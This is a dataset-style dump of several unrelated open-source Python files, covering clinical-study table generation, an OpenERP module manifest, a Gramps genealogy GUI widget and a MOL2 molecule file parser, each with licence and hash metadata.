log.emit('Generating PERIODCITY table...')
pt = T.PeriodictyTable(aggr, log)
pt.run()
pt.exportLatexTable(summary=False)
pt.exportLatexTable(summary=True)
# Export Participant Info
if options['participant-info']:
log.emit('Generating PARTICIPANTS-INFO table...')
participantInfo = aggr.getPariticpantsInfo()
features = [
'id',
'gender',
'age',
'durationIllness',
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'Clozapine',
'No.of.Drugs'
]
participantInfoSelect = participantInfo[features]
aggr.exportLatexTable(participantInfoSelect, 'DataParticipantInfo')
# Compliance
if options['compliance']:
log.emit('Generating COMPLIANCE figure and table...')
# Compliance Figure
comp = T.Compliance(aggr, log)
comp.generateFigure(show=False, save=True)
comp.exportLatexTable(save=True)
# Compliance Information Gain
comp = T.Compliance(aggr, log)
comp.normaliseMissingness()
labelsNoMissingness = comp.dfCount.T['No Missingness']
labelsSleep = comp.dfCount.T['sleep']
labelsSymptom = comp.dfCount.T['symptom']
infoTable = aggr.getPariticpantsInfo()
labels = {'Passive data': labelsNoMissingness,
'Active (Sleep Q.)': labelsSleep,
'Active (Symptoms Q.)': labelsSymptom}
features = [
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'age',
'durationIllness',
'gender',
'Clozapine',
'No.of.Drugs'
]
igTable = T.InfoGainTable(infoTable[features], labels)
igTable.run()
igTable.exportLatexTable(aggr.pathPlot, orderedBy='Passive data', save=True)
# Stationarity results
if options['stationarity']:
log.emit('Generating STATIONARITY table...')
stTable = T.StationaryTable(aggr, log)
stTable.run()
stTable.exportLatexTable(show=False, save=True)
# Symptom Score discretisation
if options['symptom-score-discretisation']:
log.emit('Generating SYMPTOM-SCORE-DISCRETISATION table...')
disTable = T.DiscretisationTable(aggr, log)
disTable.run()
disTable.exportLatexTable(show=False, save=True)
# feature delay
if options['feature-delay']:
log.emit('Generating FEATURE-DELAY table...')
dEval = T.DelayEval(aggr, log)
dEval.generateDelayTable()
dEval.exportLatexTable()
# feature selection with MIFS & mRMR
if options['feature-selection']:
log.emit('Generating FEATURE-SELECTION table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fs.generateFigure(show=True)
# SVM-linear results
if options['non-parametric-svm']:
log.emit('Generating NON-PARAMETRIC-SVM table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fMifs = []
fMrmr = []
for table in fs.histogramsFs:
if 'MIFS-ADASYN' in table.columns:
fMifs = list(table.index[0:10])
if 'mRMR-ADASYN' in table.columns:
fMrmr = list(table.index[0:10])
totalF = {
'mRMR': {'ADASYN': {'fRank': fMifs}},
'MIFS': {'ADASYN': {'fRank': fMrmr}}
}
results = T.compute_SVM_on_all_participants(aggr, totalF, log)
pTotal = Participant(id=99, path=path)
pTotal.id = 'Total'
pTotal.nonParametricResults = results
aggr.aggregates.append(pTotal)
npEval = T.NonParametricSVMEval(aggr, log)
npEval.logClassificationReports()
npEval.summarise()
npEval.exportLatexTable(show=True)
log.emit('\n{}'.format(np.mean(npEval.summary)), indents=1)
log.emit('\n{}'.format(np.std(npEval.summary)), indents=1)
# GP results
if options['non-parametric-gp']:
gpEval = T.GaussianProcessEval(aggr, log)
gpEval.logClassificationReports()
gpEval.exportLatexTable(mean=False)
gpEval.exportLatexTable(mean=True)
gpEval.plotSummaryGP(plot_path)
| apache-2.0 | -5,265,038,417,409,206,000 | 31.198718 | 80 | 0.643241 | false |
3dfxsoftware/cbss-addons | account_chart_wiz_dates/__openerp__.py | 1 | 1726 | # -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2010 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo ([email protected])
############################################################################
# Coded by: Luis Torres ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name" : "Wizard Account Chart Dates",
"version" : "1.0",
"author" : "Vauxoo",
"category" : "Generic Modules",
"description" : """
Add fields for date initial & end
""",
"website" : "http://www.vauxoo.com/",
"license" : "AGPL-3",
"depends" : ["account",
],
"init_xml" : [],
"demo_xml" : [],
"update_xml" : [
"wizard/account_chart_view.xml",
],
"installable" : True,
"active" : False,
}
| gpl-2.0 | -4,364,303,108,559,540,000 | 36.521739 | 78 | 0.522596 | false |
platinhom/CADDHom | python/format/HHmol2.py | 1 | 4222 |
# -*- coding: utf-8 -*-
"""
Created on 2015-10-05
@author: Zhixiong Zhao
"""
import __init__
from HHFormat import *
import molecule.HHMolecule
import molecule.HHAtom
import molecule.HHResidue
import molecule.HHBond
import geometry.HHPoint
Mol=molecule.HHMolecule.Molecule
Atom=molecule.HHAtom.Atom
Res=molecule.HHResidue.Residue
Bond=molecule.HHBond.Bond
Point=geometry.HHPoint.Point
class MOL2(FileFormator):
extension=['mol2'];
def CreateAtomLine(self, atom, lenatom=4, lenres=3):
output=atom.index.rjust(lenatom)+" "+atom.name.ljust(5)
output+=("%.4f" % atom.coordinates.x).rjust(11) + ("%.4f" % atom.coordinates.y).rjust(11)+ ("%.4f" % atom.coordinates.z).rjust(11)+ ' '
output+=atom.atype.ljust(6)+str(atom.resid).rjust(lenres)+ ' ' + atom.resname.ljust(6)+ atom.pcharge.rjust(9)+ os.linesep
return output
def CreateBondline(bond,lenbond=4):
output=bond.index.rjust(lenbond)+" "+bond.idx_bgn.rjust(lenbond)+" "+\
bond.idx_end.rjust(lenbond)+" "+bond.btype.lower().ljust(lenbond)+ os.linesep
return output
def WriteObj(self,obj):
if (isinstance(obj,Atom)):
self.write(CreateAtomLine(obj))
elif(isinstance(obj,Res) or isinstance(obj,Mol)):
for atom in obj.atoms:
self.write(CreateAtomLine(atom))
elif(isinstance(obj,Bond)):
self.write(CreateBondline(obj));
else:
self.write(str(obj));
def ReadAtomLine(self, Line):
items=Line.split()
atom=Atom()
atom.index = int(items[0])
atom.atomid = int(items[0])
atom.name = items[1]
atom.coordinates = Point(float(items[2]), float(items[3]), float(items[4]))
atom.atype=items[5]
#sybyl type
#atom.element_name=atom.atype[0:2].strip('.').strip()
atom.element_name=atom.DeduceElementFromName(atom.name);
if len(items)==9:
atom.resid = int(items[6])
atom.resname = items[7]
atom.charge = items[8]
return atom;
def ReadBondLine(self, Line):
items=Line.split()
bond=Bond()
bond.index = int(items[0])
bond.idx_bgn = int(items[1])
bond.idx_bgn = int(items[2])
bond.btype = items[3]
return bond;
def WriteMolFile(self,mol,filename):
self.open(filename,'w');
self.write("@<TRIPOS>MOLECULE\n")
self.write(mol.name+'\n')
self.write("%5d %5d %5d %5d %5d \n", mol.GetNumAtom(), mol.GetNumBond(), mol.GetNumFrag(), 0, 0);
self.write("@<TRIPOS>ATOM\n");
self.WriteObj(mol);
self.write("@<TRIPOS>BOND\n");
def ReadMolFile(self, filename):
self.open(filename,'r');
findmol=False;
findatom=False;
findbond=False;
nextmol=False;
mols=[]
mol=None
for line in self.handle:
if (line[:17] == "@<TRIPOS>MOLECULE"):
findmol=True;
findatom=False;
findbond=False;
if (nextmol):
mols.append(mol)
nextmol=False;
mol=Mol()
continue;
if (line[:13] == "@<TRIPOS>ATOM"):
findatom=True;
findmol=False;
nextmol=True;
continue;
if (line[:13] == "@<TRIPOS>BOND"):
findatom=False;
findbond=True;
continue;
if (findbond and line[:9]=="@<TRIPOS>"):
findbond=False;
continue;
if (findatom):
atom=self.ReadAtomLine(line);
atom.mol=mol;
mol.atoms.append();
if (findbond):
bond=self.ReadBondLine(line);
bond.mol=mol;
bond.SetAtomsFromIdx()
mol.bonds.append(bond);
mols.append(mol);
self.close();
if (len(mols)==1):return mols[0];
elif (len(mols)>1):return mols;
elif (len(mols)==0):return None;
if __name__=="__main__":
mr=MOL2()
a=mr.ReadMolFile("test.mol2");
print a
print a.atoms[0]
| gpl-2.0 | 2,584,344,862,297,078,300 | 30.044118 | 143 | 0.541686 | false |
ondrokrc/gramps | gramps/gui/editors/displaytabs/backreflist.py | 1 | 4638 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2009-2011 Gary Burton
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Python classes
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# GTK libraries
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
#-------------------------------------------------------------------------
#
# GRAMPS classes
#
#-------------------------------------------------------------------------
from ...widgets import SimpleButton
from .embeddedlist import EmbeddedList, TEXT_COL, MARKUP_COL, ICON_COL
from ...utils import edit_object
#-------------------------------------------------------------------------
#
# BackRefList
#
#-------------------------------------------------------------------------
class BackRefList(EmbeddedList):
_HANDLE_COL = 3
#index = column in model. Value =
# (name, sortcol in model, width, markup/text, weigth_col
_column_names = [
(_('Type'), 0, 100, TEXT_COL, -1, None),
(_('ID'), 1, 75, TEXT_COL, -1, None),
(_('Name'), 2, 250, TEXT_COL, -1, None),
]
def __init__(self, dbstate, uistate, track, obj, refmodel, callback=None):
self.obj = obj
EmbeddedList.__init__(self, dbstate, uistate, track,
_('_References'), refmodel)
self._callback = callback
self.connectid = self.model.connect('row-inserted', self.update_label)
self.track_ref_for_deletion("model")
def update_label(self, *obj):
if self.model.count > 0:
self._set_label()
if self._callback and self.model.count > 1:
self._callback()
def right_click(self, obj, event):
return
def _cleanup_local_connects(self):
self.model.disconnect(self.connectid)
def _cleanup_on_exit(self):
# model may be destroyed already in closing managedwindow
if hasattr(self, 'model'):
self.model.destroy()
def is_empty(self):
return self.model.count == 0
def _create_buttons(self, share=False, move=False, jump=False, top_label=None):
"""
Create a button box consisting of one button: Edit.
This button box is then appended hbox (self).
Method has signature of, and overrides create_buttons from _ButtonTab.py
"""
self.edit_btn = SimpleButton('gtk-edit', self.edit_button_clicked)
self.edit_btn.set_tooltip_text(_('Edit reference'))
hbox = Gtk.Box()
hbox.set_spacing(6)
hbox.pack_start(self.edit_btn, False, True, 0)
hbox.show_all()
self.pack_start(hbox, False, True, 0)
self.add_btn = None
self.del_btn = None
self.track_ref_for_deletion("edit_btn")
self.track_ref_for_deletion("add_btn")
self.track_ref_for_deletion("del_btn")
def _selection_changed(self, obj=None):
if self.dirty_selection:
return
if self.get_selected():
self.edit_btn.set_sensitive(True)
else:
self.edit_btn.set_sensitive(False)
def get_data(self):
return self.obj
def column_order(self):
return ((1, 0), (1, 1), (1, 2))
def find_node(self):
(model, node) = self.selection.get_selected()
try:
return (model.get_value(node, 4), model.get_value(node, 3))
except:
return (None, None)
def edit_button_clicked(self, obj):
(reftype, ref) = self.find_node()
edit_object(self.dbstate, self.uistate, reftype, ref)
| gpl-2.0 | 2,038,408,885,428,916,200 | 32.854015 | 83 | 0.544631 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.